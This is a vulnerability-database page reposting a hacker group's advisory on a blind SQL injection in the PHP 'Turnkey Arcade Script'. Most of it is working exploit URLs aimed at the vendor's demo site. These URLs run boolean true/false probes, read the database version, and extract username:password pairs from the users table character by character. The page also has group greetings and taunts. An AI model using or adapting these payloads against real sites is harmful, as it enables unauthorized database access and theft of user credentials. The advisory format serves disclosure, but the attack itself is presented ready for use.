|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Red-D3v1L Added by : SecurityReason SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : [?] ~ Note : sEc-r1z CrEw# r0x ! ========== [?] Turnkey Arcade Script Blind SQL Injection Vulnerability ========== [?] My home: [ http://sec-r1z.com ] [?] For Ask: [r-d@passport.com] [?] Script: [ Turnkey Arcade Script ] [?] Language: [ PHP ] [?] Founder: [ Red-D3v1L ] [?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ] [?] n00bz : [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..] ########### ===[ Exploit SQL Blind ]=== [»]Exploit : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20 1=1 << this true http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20 1=0 << this faulse http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20 substring%28@@version,1,1%29=4 << this true http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20 substring%28@@version,1,1%29=5 << this faulse http://www.turnkeyarcade.com/demo/index.php?action=browse&id=7%20and%20 %28select%20substring%28concat%281,concat%28username,0x3a,password%29%29,1, 1%29%20from%20users%20%20limit%200,1%29=1 ./Greetz For All my Frindes ========== #sEc-r1z.com Str1kEz y0u ! If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |